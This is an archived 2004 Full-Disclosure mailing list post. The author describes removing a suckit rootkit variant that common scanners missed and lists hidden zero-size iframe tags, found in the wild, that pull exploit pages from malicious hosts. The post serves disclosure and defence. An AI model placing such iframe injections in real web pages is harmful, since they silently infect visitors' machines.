Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorio_at_edmaster.it)
Date: 10/27/04

Next message: Thierry Carrez: "[ GLSA 200410-22 ] MySQL: Multiple vulnerabilities"

Previous message: Luke Macken: "[ GLSA 200410-25 ] Netatalk: Insecure tempfile handling in etc2ps.sh"
In reply to: Ron DuFresne: "Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild"
Next in thread: Hugo van der Kooij: "Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild"
Reply: Hugo van der Kooij: "Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <full-disclosure@lists.netsys.com>
Date: Wed, 27 Oct 2004 01:22:06 +0200

Finally, I clean the compromised box of my friend :))
I've found (following many helpful suggestions of people in FD list)
that a variant of "suckit" rootkit was installed on this machine.
The strange thing is that "rkhunter" and "chkrootkit" don't catch it :((((
in any way and they said that everything is ok.

To found suckit and deactivate it I used this :
http://tsd.student.utwente.nl/skdetect/
It's a code based on suckit source code, but without the malware part.
It can dig into /dev/kmem and explores sys_call_table[];
skdetect was able to found suckit installed.
Another person who was compromised by the "xpire.info" hacker said to me
that
the symptoms were the same and also in his host he found this suckit variant
installed.

>suckit version 'Q' DETECTED
>kernel-part uninstall seems successful.

After reboot everything come back to normal activity.
Thank you to everyone for the answers given to me
(Ron DuFresne, Nick FitzGerald, Kevin and others).

Actually on "xpire.info/fa/?d=get" malware page you can found this exploits
in the wild :

#IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm" WIDTH=0 BORDER=0
HEIGHT=0></IFRAME#
#iframe src="http://xpire.info/fa/t3.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/x.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/proc.htm" width=1 height=1></iframe#
#iframe src="http://xpire.info/fa/runevil.htm" width=1 height=1></iframe#
#iframe src="http://213.159.117.133/dl/adv121.php" width=1
height=1></iframe#
!-- #IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME#
//-->

There a lot of backdoor/trojan ready-to-install and the bad news is that
most
of this malware are recompiled, so many AV are fooled and don't catch them
(for example Symantec and ClamAV don' recognize many malware
in this site, after a quick test made with www.virustotal.com)

Bye,
EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Thierry Carrez: "[ GLSA 200410-22 ] MySQL: Multiple vulnerabilities"

Previous message: Luke Macken: "[ GLSA 200410-25 ] Netatalk: Insecure tempfile handling in etc2ps.sh"
In reply to: Ron DuFresne: "Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild"
Next in thread: Hugo van der Kooij: "Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild"
Reply: Hugo van der Kooij: "Re: [SPAM] Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]